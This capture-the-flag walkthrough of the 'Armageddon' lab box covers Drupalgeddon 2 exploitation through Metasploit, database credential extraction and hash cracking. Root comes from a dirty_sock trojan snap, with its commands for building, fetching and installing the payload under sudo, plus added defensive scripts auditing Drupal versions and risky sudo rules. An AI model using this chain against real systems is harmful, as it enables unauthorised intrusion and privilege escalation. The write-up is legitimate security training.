# Armageddon (Easy)

## Nmap

```
nmap -sC -sV 10.10.10.233
```

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 01:03 EDT
Nmap scan report for 10.10.10.233
Host is up (0.13s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds
```

We can see that port 80 is open.

From robots.txt, we can navigate to **/CHANGELOG.txt**.

We can see that it is running Drupal 7.56. With some further research, we find that we can use the Metasploit module Drupalgeddon 2 Forms API Property Injection to exploit the web app.
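A defender-side version check for this step, added here and not part of the original writeup: it reads the first release header of a Drupal 7 `CHANGELOG.txt` (the constructed sample below follows the real file layout, newest release first) and reports which core advisories that release predates. The advisory table is a small hand-written lookup; Drupalgeddon 2 (SA-CORE-2018-002, CVE-2018-7600) was fixed in Drupal 7.58.

```python
import re

# Constructed excerpt in the layout of a Drupal 7 CHANGELOG.txt (newest release
# first). It is a sample in the same format, not the file from the box.
SAMPLE_CHANGELOG = """\
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

Drupal 7.55, 2017-06-07
-----------------------
- Fixed incompatibility with PHP versions 7.0.19 and 7.1.5 due to duplicate
  definition of a PHP build function.
"""

# Hand-written lookup: first Drupal 7 release that fixes each advisory.
FIXED_IN = {
    (7, 58): "SA-CORE-2018-002 (Drupalgeddon 2, CVE-2018-7600)",
    (7, 59): "SA-CORE-2018-004 (CVE-2018-7602)",
}

# Release header line, e.g. "Drupal 7.56, 2017-06-21" or "Drupal 7.0-rc1, ...".
_HEADER = re.compile(r"^Drupal (\d+)\.(\d+)(?:[-.]\S+)?, (\d{4}-\d{2}-\d{2})", re.M)


def installed_version(changelog: str):
    """Return (major, minor) from the first release header, i.e. the running version."""
    m = _HEADER.search(changelog)
    if not m:
        raise ValueError("no Drupal release header found")
    return int(m.group(1)), int(m.group(2))


def missing_advisories(version):
    """Advisories whose fixing release is newer than the installed version."""
    return [adv for fixed, adv in sorted(FIXED_IN.items()) if version < fixed]


if __name__ == "__main__":
    v = installed_version(SAMPLE_CHANGELOG)
    print("Drupal %d.%d" % v)
    for adv in missing_advisories(v):
        print("  unpatched:", adv)
```

Drupal's own robots.txt lists CHANGELOG.txt, so the same file that lets an attacker fingerprint the version lets a defender confirm patch level without touching the database.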

After that, we get a reverse shell from Metasploit.

Then we need to find some valuable information.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-nGI0bf_ciCtovbRC%2F-Mb-q2hgRcJ5I0y4Lj4F%2Fimage.png?alt=media\&token=9719b3bb-7396-498e-b883-f8db77c17ffc)

Finally, in this folder, we can cat out **settings.php**.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-nGI0bf_ciCtovbRC%2F-Mb-qGxSy5EvblT-rQLz%2Fimage.png?alt=media\&token=4d480b1a-96e5-4270-a3a7-4489dff1d7a0)

Here we can see the database login password, so let's log in through mysql.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-rwevGmsRVEDNZJbe%2Fimage.png?alt=media\&token=d2784ffb-9db7-47a4-910b-7d6ae5c76f03)

We can see there is a password hash for the user **brucetherealadmin**, which we can pass to john to crack the password.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-rz247Ooel_tr2PoB%2Fimage.png?alt=media\&token=6b8dd615-e55e-4d38-ae5c-d490443c6f4e)

We can now SSH to the user **brucetherealadmin**.

## Privilege Escalation

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-sBlw4LZfKZehPKDF%2Fimage.png?alt=media\&token=94807f95-e16f-4285-97c4-697a9ecc5e8d)

We can see that snap can be run with sudo and can install anything.

After some tries, we realised that snap can only install local snap packages.
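A defender-side audit of the sudo rule this step relies on, added here and not part of the original writeup: it parses `sudo -l` output (a constructed sample in the same shape, with the snap rule as the page describes it; the hostname is made up) and flags any rule that lets a user hand an arbitrary package to a root-level installer, which is what makes a local `snap install` with a crafted package equivalent to root.

```python
import re

# Constructed `sudo -l` output in the shape sudo prints it. The snap rule models
# what the writeup describes; the hostname "armageddon" is invented.
SAMPLE_SUDO_L = """\
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS"

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/bin/systemctl restart httpd
"""

# Package managers whose install path runs package-supplied hooks or scripts
# as root, so an unrestricted "install *" rule is as good as a root shell.
INSTALLERS = {"snap", "apt", "apt-get", "dpkg", "rpm", "yum", "dnf", "pip", "pip3", "npm"}

# One command rule: "(runas) [TAG: ...] /path/to/cmd [args]"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")


def parse_rules(sudo_l_output: str):
    """Return (runas, nopasswd, command, args) for each command rule in `sudo -l` text."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = _RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        rules.append((m.group("runas"), nopasswd, m.group("cmd"), m.group("args").strip()))
    return rules


def risky_install_rules(rules):
    """Rules granting ALL, or an installer with no argument list (= any args) or a wildcard."""
    flagged = []
    for runas, nopasswd, cmd, args in rules:
        name = cmd.rsplit("/", 1)[-1]
        if name == "ALL" or (name in INSTALLERS and (args == "" or "*" in args)):
            flagged.append((runas, nopasswd, cmd, args))
    return flagged


if __name__ == "__main__":
    for rule in risky_install_rules(parse_rules(SAMPLE_SUDO_L)):
        print("RISKY:", rule)
```

The mitigation is to drop the wildcard (pin the exact package arguments) or remove the rule; `--devmode` installs of unsigned local snaps should never be reachable through sudo.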

What we can do is go [here](https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py) and get the TROJAN SNAP code.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-y1ZCS4b1d34JMjnJ%2Fimage.png?alt=media\&token=fcb0d4ee-fdf2-498b-b6f6-c2e6aafbfd60)

Then we can use python to write the code to a file:

```
python3 -c "print('''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'''+ 'A' * 4256 + '==')" > evil.snap
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yCrlYzCAaM3RLxE7%2Fimage.png?alt=media\&token=7627229a-3a68-40af-bba4-e17c7333828e)

```
cat evil.snap | base64 -d > evilReadable.snap
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yJcOgAm0Bp-9uFRI%2Fimage.png?alt=media\&token=e3c75bae-bc0e-496a-8b8a-29ec5817945c)

Then we get something like this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-ybQpjwrXp2XCkDYa%2Fimage.png?alt=media\&token=da80ef60-b547-4253-b36d-477f46537e94)

We can then fire up **python SimpleHTTPServer** and curl the file from the victim machine.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yxI0Fsq-6zepjw4z%2Fimage.png?alt=media\&token=d0da96e2-acc3-4e79-a140-94bb7c5b4889)

Then we can run:

```
sudo /usr/bin/snap install evilReadable.snap --devmode
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-z5wo2woHQneG_C5q%2Fimage.png?alt=media\&token=c2cf54d4-3a07-4724-8acd-de84e88f41d5)

OK, **dirty sock** has been installed.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zEdeexY7G22t31LE%2Fimage.png?alt=media\&token=f464b2d7-06db-4d43-8db4-9b29f169ca54)

We can see that a new user `dirty_sock` has been created.

Navigating back to the code, we can see this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zO6vm4tie7kAI544%2Fimage.png?alt=media\&token=165a824e-180b-4b64-9953-7b0893aef008)

We can then **su** to the user `dirty_sock` with the password `dirty_sock`.

Then we can use `sudo /bin/bash` to get **root**.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zjYRC3rJTMIocTZI%2Fimage.png?alt=media\&token=fc9efc24-576b-426a-a791-bbb6c8dd35c3)

Congratz!
